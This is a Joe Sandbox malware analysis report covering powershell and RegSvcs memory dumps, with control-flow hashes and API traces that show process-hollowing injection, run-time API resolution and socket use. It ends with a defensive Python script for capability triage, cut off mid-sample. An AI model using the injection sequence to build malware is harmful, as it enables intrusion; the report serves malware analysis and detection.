                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3022530563.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: ce3b8cea95a3d626b41359a2639fad474c78014b5c75899ed51dd8335059cec1
                                    • Instruction ID: e98bfea04111b67a93b9baeee3e0b6ba5480a252f0304094a3f589a1b5f37957
                                    • Opcode Fuzzy Hash: ce3b8cea95a3d626b41359a2639fad474c78014b5c75899ed51dd8335059cec1
                                    • Instruction Fuzzy Hash: 6351BF70D0864D8FDB55DF98C884BE9BBF1FB5A310F1482AAD048D7266C7749885CF90

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3022530563.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7ffd9b8a0000_powershell.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: 2710b7cb123b5bfd3c0d48ef2d4102fb570ae785d6a1b0ac5e20e9d3b4718d17
                                    • Instruction ID: cd6cb4529f14f7f8f5791346a76261f397523e333b584773c72b8d04065944aa
                                    • Opcode Fuzzy Hash: 2710b7cb123b5bfd3c0d48ef2d4102fb570ae785d6a1b0ac5e20e9d3b4718d17
                                    • Instruction Fuzzy Hash: 8E418D7090C74C8FDB59DF98D885BA9BBF0FF5A310F1041AED049E7252DA70A846CB51

                                    Control-flow Graph

                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3038197059.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c6e36103bd7d6d96baf1d35a7832ca2f7a6134f316bc3a26e79f1b773a277487
                                    • Instruction ID: 153d8fe903f4cf9612376e0b71fecae5ee132612db7ad346dabebca10e23c784
                                    • Opcode Fuzzy Hash: c6e36103bd7d6d96baf1d35a7832ca2f7a6134f316bc3a26e79f1b773a277487
                                    • Instruction Fuzzy Hash: 28416832F2FA5D1FEBB8CA9848A513537D2EF95718F0E027ED44DC71A2DE14AD068281

                                    Control-flow Graph

                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3038197059.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1ccf6dec0766172d12cadafa467e13bb335f3231a33b3e20aec57a502482c089
                                    • Instruction ID: 37e282d537dddfa4d44c57340f793b8da0e660e00bc86feb19167144ccb45953
                                    • Opcode Fuzzy Hash: 1ccf6dec0766172d12cadafa467e13bb335f3231a33b3e20aec57a502482c089
                                    • Instruction Fuzzy Hash: 8331E622F3FF0D1BEBB4979818E56B86BC1EF94B11F4A017AE45DC31A2ED14AD024281
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3038197059.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7ffd9b970000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 015ec822a98bafc4e7876018c90f70248864feafcd5d4b319e5f038715a6a224
                                    • Instruction ID: c8b9e66d788ef0ecca925fca794ba0d6ef842ddd9a60213b471c3a772e180259
                                    • Opcode Fuzzy Hash: 015ec822a98bafc4e7876018c90f70248864feafcd5d4b319e5f038715a6a224
                                    • Instruction Fuzzy Hash: 8931C222F2FA8E1BFBB9A3A814B52B866C1EF55B94B1900FAD45DC31E3ED0D5D004341
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1976439811.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffd9b8a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                    • Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                    • Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.2972546934.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                    • Instruction ID: 79df91dbeca4578efdafbcff0581408dee29dbd6cc9aa5e7bb99ce125f81f538
                                    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                    • Instruction Fuzzy Hash: 1D01A73020CB0C4FD748EF0CE451AA6B3E0FB99320F10056EE58AC36A1D632E882CB41

                                    Execution Graph

                                    Execution Coverage: 17.8%
                                    Dynamic/Decrypted Code Coverage: 0%
                                    Signature Coverage: 0%
                                    Total number of Nodes: 12
                                    Total number of Limit Nodes: 0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph (rendered image; basic blocks 7ffd9b950f5b-7ffd9b9515db, node and edge listing omitted, no API calls annotated)
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3267454060.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_7ffd9b950000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a542a0399b78a340e200d4ff5d51f575c137fbc87cf4cf8e76bb17e4263650b0
                                    • Instruction ID: 153a5fa226c954095f49475f3441dae1b58388d739be0d8d646f943291edc40d
                                    • Opcode Fuzzy Hash: a542a0399b78a340e200d4ff5d51f575c137fbc87cf4cf8e76bb17e4263650b0
                                    • Instruction Fuzzy Hash: 62327A31B5EB8D1FE76A97A858615743BE1EF87214B0901FBD88DC71E3DA58AC06C341

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3260030078.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_7ffd9b880000_powershell.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: e52fc6ad44d893366047ba43bbd7359b3d590f0c1eb072a8655e3415d313fb8c
                                    • Instruction ID: de5e525fda41b035b5ba6e1ad2287aa9347b44f861b570013ecf1de2606e883d
                                    • Opcode Fuzzy Hash: e52fc6ad44d893366047ba43bbd7359b3d590f0c1eb072a8655e3415d313fb8c
                                    • Instruction Fuzzy Hash: CDF19F7090DA9D8FDB99DF18C865BE9BBF0EF1A310F0501EEC049E72A2DA745985CB41

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3260030078.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_7ffd9b880000_powershell.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: e39dd7a4589b3ddf8ee8a229759dc5d601b09a28c238111000b7d6b397ab7068
                                    • Instruction ID: 29e3b7931d2769ed52a37c3fe93d5c1ad04c22296d8022f64a3ff384818e2325
                                    • Opcode Fuzzy Hash: e39dd7a4589b3ddf8ee8a229759dc5d601b09a28c238111000b7d6b397ab7068
                                    • Instruction Fuzzy Hash: 8DC12374908A5C8FDBA8DF58C894BE9BBF1FB6A310F1041AED04DE3251DB74A985CB44

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3260030078.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_7ffd9b880000_powershell.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: c5a4181172ff1da0a446ae1b3aa828affa8134350ea65c2167bba45d1efe2b1e
                                    • Instruction ID: 81a5c037c783f09810b686cd64becdca743d6db7826f8b4bcbef1dd9eeeac29f
                                    • Opcode Fuzzy Hash: c5a4181172ff1da0a446ae1b3aa828affa8134350ea65c2167bba45d1efe2b1e
                                    • Instruction Fuzzy Hash: EE51BE70D08A4D8FDB55DFA8C884BE9BBF1FB5A311F1082AAD048D7266D7749485CF40

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph (rendered image; basic blocks 7ffd9b8880d9-7ffd9b888200, edge listing omitted; the block 7ffd9b8880f0-7ffd9b8881ba calls ResumeThread)
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3260030078.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_7ffd9b880000_powershell.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: e8a5b8ada2e86c95ad5192d06c222ac97cb63900add309773bcdb7fc215c129a
                                    • Instruction ID: 4602f4b3e48a09c1a1e914b48237b9a543f8a0edcac46491062d85257e4280e0
                                    • Opcode Fuzzy Hash: e8a5b8ada2e86c95ad5192d06c222ac97cb63900add309773bcdb7fc215c129a
                                    • Instruction Fuzzy Hash: 6A415E30A08B4C8FDB59DF98D895BADBBF0FF5A310F1041AED059D7292DA70A846CB41

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph (rendered image; basic blocks 7ffd9b9509f5-7ffd9b950f44, node and edge listing omitted, no API calls annotated)
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3267454060.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_7ffd9b950000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 25dc77bd230a1d217c7f07ff14372adc6e01b0ca2bb2e3ad61dd009bbb4dc0ee
                                    • Instruction ID: c259c64ab048d672d906c99ca2d4028258ba1aaf810e7082eb9dee2c9742286b
                                    • Opcode Fuzzy Hash: 25dc77bd230a1d217c7f07ff14372adc6e01b0ca2bb2e3ad61dd009bbb4dc0ee
                                    • Instruction Fuzzy Hash: 54125422B5EB8D1FE76687A858255B53FE1EF57610B0A01FBD88CC71E3D908AD06C352

                                    Control-flow Graph

                                    Memory Dump Source
                                    • Source File: 00000015.00000002.3267454060.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_7ffd9b950000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a30fd023bcac4febf576f360ead034ba3b5943ba75decb5d04c97f5e5f99a84b
                                    • Instruction ID: 8378d81a0d1b6c23ba5c91048449636eb6f8ebe43cf7c7dd1cde7c0aadad337d
                                    • Opcode Fuzzy Hash: a30fd023bcac4febf576f360ead034ba3b5943ba75decb5d04c97f5e5f99a84b
                                    • Instruction Fuzzy Hash: 8A411722F1EE4E1FFBA897AC14756B873C1EF55A61B1500BBD85EC31E2ED08AD028341
                                    Memory Dump Source
                                    • Source File: 00000017.00000002.2971156207.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_23_2_7ffd9b980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cd60e017b62a8b7b26310452bfd750dfa299dece239fb97ccc826cf0257b9caa
                                    • Instruction ID: 013575c9752518f3e4a4418cadc9c78a08dcb18d30a0c96ad5f83c834df51536
                                    • Opcode Fuzzy Hash: cd60e017b62a8b7b26310452bfd750dfa299dece239fb97ccc826cf0257b9caa
                                    • Instruction Fuzzy Hash: FAC15532B1FE8E1FEBA4EBA848659B57BD1EF55310B0901FED45DC70E3DA29A9018341
                                    Memory Dump Source
                                    • Source File: 00000017.00000002.2958666018.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_23_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b85ccf881ab4f70b2f64ae7eccbe0d46dbfcc948a0742cf5bee9662f4f647fea
                                    • Instruction ID: 52823b9f283d4d52118657c5908b6e344685c983be99fd378b5a183adc0e76d1
                                    • Opcode Fuzzy Hash: b85ccf881ab4f70b2f64ae7eccbe0d46dbfcc948a0742cf5bee9662f4f647fea
                                    • Instruction Fuzzy Hash: E131C16660E7D54FE7179BA8A8625E13F70EF53274B0A01EBC0C5CB0B3D919294BC7A1
                                    Memory Dump Source
                                    • Source File: 00000017.00000002.2971156207.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_23_2_7ffd9b980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b095c4ffbc31fcbf7db4ca05e8190fd3da82edecec5f59965a3a43763c032884
                                    • Instruction ID: 83b66d27cbdaaae012fb8bb2c33d4d84fb9a46a9f2f4669c704d76b8edceaea7
                                    • Opcode Fuzzy Hash: b095c4ffbc31fcbf7db4ca05e8190fd3da82edecec5f59965a3a43763c032884
                                    • Instruction Fuzzy Hash: 7711C122F1EA8E5FFB64DAD890A06B8B7D1EF58310F5501BED05DD7093DA2AA9418360
                                    Memory Dump Source
                                    • Source File: 00000017.00000002.2958666018.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_23_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4e704c2f9787c5482f3ef504e6ed8ef1b0faa200ce0f5ae5831ad015ab4922c7
                                    • Instruction ID: d32098309b1a6811cd9a6615f808be0c1925d9f0fe18ef4f00fb21267d00c869
                                    • Opcode Fuzzy Hash: 4e704c2f9787c5482f3ef504e6ed8ef1b0faa200ce0f5ae5831ad015ab4922c7
                                    • Instruction Fuzzy Hash: 0401A73120CB0C4FD748EF0CE451AA6B3E0FB89320F10056EE58AC36A1DA32E881CB41

                                    Execution Graph

                                    Execution Coverage: 1%
                                    Dynamic/Decrypted Code Coverage: 0%
                                    Signature Coverage: 4.6%
                                    Total number of Nodes: 479
                                    Total number of Limit Nodes: 7
                                    execution_graph (rendered image; node and edge listing omitted; entry node 434887)
                                    API calls annotated on the graph nodes: IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetStartupInfoW, GetModuleHandleA, GetModuleHandleW, LoadLibraryA, GetProcAddress, GetModuleFileNameW, FindResourceA, LoadResource, LockResource, SizeofResource, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, RegOpenKeyExW, RegDeleteValueW, CreateProcessA, CloseHandle, CreateThread, CreateMutexA, GetLastError, StrToIntA, DeleteFileW, Sleep
                                    CRT/library routines annotated on the graph nodes: ___FrameUnwindToState, ___scrt_is_nonwritable_in_current_image, ___scrt_release_startup_lock, ___scrt_get_show_window_mode, __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z, __EH_prolog, ___crtLCMapStringA, _abort, _free, _wcslen, _swprintf, _Yarn, ctype, std::_Deallocate
4020d9 47035->46855 47037 4020b7 28 API calls 47036->47037 47038 406dec 47037->47038 47038->46862 47039->47028 47040->47027 47042 402428 47041->47042 47043 4023d8 47041->47043 47042->47033 47043->47042 47052 4027a7 11 API calls std::_Deallocate 47043->47052 47046 40251a 47045->47046 47047 402520 47046->47047 47048 402535 47046->47048 47053 402569 47047->47053 47063 4028e8 28 API calls 47048->47063 47051 402533 47051->47035 47052->47042 47064 402888 47053->47064 47055 40257d 47056 402592 47055->47056 47057 4025a7 47055->47057 47069 402a34 22 API calls 47056->47069 47071 4028e8 28 API calls 47057->47071 47060 40259b 47070 4029da 22 API calls 47060->47070 47062 4025a5 47062->47051 47063->47051 47065 402890 47064->47065 47066 402898 47065->47066 47072 402ca3 22 API calls 47065->47072 47066->47055 47069->47060 47070->47062 47071->47062 47074 4020e7 47073->47074 47075 4023ce 11 API calls 47074->47075 47076 4020f2 47075->47076 47076->46887 47077->46887 47078->46887 47079->46879 47080->46890 47081->46894 47082->46899 47083->46897 47084->46907 47085->46907 47095 4127ee 61 API calls 47092->47095 47097 4431a8 _abort 47096->47097 47098 4431c0 47097->47098 47100 4432f6 _abort GetModuleHandleW 47097->47100 47118 445888 EnterCriticalSection 47098->47118 47101 4431b4 47100->47101 47101->47098 47130 44333a GetModuleHandleExW 47101->47130 47104 4431c8 47106 44323d 47104->47106 47116 443266 47104->47116 47138 443f50 20 API calls _abort 47104->47138 47115 443255 47106->47115 47139 4441f5 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 47106->47139 47107 443283 47122 4432b5 47107->47122 47108 4432af 47141 457729 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 47108->47141 47140 4441f5 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 47115->47140 47119 4432a6 47116->47119 47118->47104 47142 4458d0 LeaveCriticalSection 47119->47142 47121 44327f 47121->47107 47121->47108 47143 448cc9 47122->47143 47125 4432e3 47127 44333a 
_abort 8 API calls 47125->47127 47126 4432c3 GetPEB 47126->47125 47128 4432d3 GetCurrentProcess TerminateProcess 47126->47128 47129 4432eb ExitProcess 47127->47129 47128->47125 47131 443364 GetProcAddress 47130->47131 47132 443387 47130->47132 47133 443379 47131->47133 47134 443396 47132->47134 47135 44338d FreeLibrary 47132->47135 47133->47132 47136 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 47134->47136 47135->47134 47137 4433a0 47136->47137 47137->47098 47138->47106 47139->47115 47140->47116 47142->47121 47144 448cee 47143->47144 47148 448ce4 47143->47148 47149 4484ca 47144->47149 47147 4432bf 47147->47125 47147->47126 47156 434fcb 47148->47156 47150 4484fa 47149->47150 47153 4484f6 47149->47153 47150->47148 47151 44851a 47151->47150 47154 448526 GetProcAddress 47151->47154 47153->47150 47153->47151 47163 448566 47153->47163 47155 448536 __crt_fast_encode_pointer 47154->47155 47155->47150 47157 434fd6 IsProcessorFeaturePresent 47156->47157 47158 434fd4 47156->47158 47160 435018 47157->47160 47158->47147 47170 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47160->47170 47162 4350fb 47162->47147 47164 448587 LoadLibraryExW 47163->47164 47165 44857c 47163->47165 47166 4485a4 GetLastError 47164->47166 47169 4485bc 47164->47169 47165->47153 47167 4485af LoadLibraryExW 47166->47167 47166->47169 47167->47169 47168 4485d3 FreeLibrary 47168->47165 47169->47165 47169->47168 47170->47162 47171 404e26 WaitForSingleObject 47172 404e40 SetEvent CloseHandle 47171->47172 47173 404e57 closesocket 47171->47173 47174 404ed8 47172->47174 47175 404e64 47173->47175 47176 404e7a 47175->47176 47184 4050e4 83 API calls 47175->47184 47178 404e8c WaitForSingleObject 47176->47178 47179 404ece SetEvent CloseHandle 47176->47179 47185 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47178->47185 47179->47174 47181 404e9b SetEvent WaitForSingleObject 47186 41e711 DeleteCriticalSection 
EnterCriticalSection LeaveCriticalSection 47181->47186 47183 404eb3 SetEvent CloseHandle CloseHandle 47183->47179 47184->47176 47185->47181 47186->47183

                                    Control-flow Graph

                                    APIs
                                    • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                    • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                    • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                    • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                    • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                    • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                    • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                    • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                    • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                    • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                    • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                    • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                    • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad$HandleModule
                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                    • API String ID: 4236061018-3687161714
                                    • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                    • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                    • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                    • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
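The routine at 0041CB65-0041CD4C above resolves its Windows APIs at run time by library and export name (and, for one Shlwapi import, by ordinal 0xC), so none of these functions appear in the binary's static import table; only the strings do, which is why the String ID list reads like an import table. The following triage script is an added example, not part of the Joe Sandbox report or of the sample: it parses these API lines into (library, export, loader, call site) entries and maps the resolved exports to coarse capability tags. The sample lines are a constructed subset copied from this block, and the CAPABILITIES table is an analyst's labelling assumed for this example, not something the report states.

```python
"""Capability triage of a runtime-resolved API table (added example).

Parses Joe Sandbox "APIs" lines such as
    LoadLibraryA.KERNEL32(<lib>,<export>,...), ref: <addr>
and tags the resolved exports. CAPABILITIES is an assumed analyst labelling.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Constructed sample: a subset of the report's lines for the resolver at 0041CB65.
SAMPLE = """\
• LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
• GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
• GetProcAddress.KERNEL32(00000000), ref: 0041CB88
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
• GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
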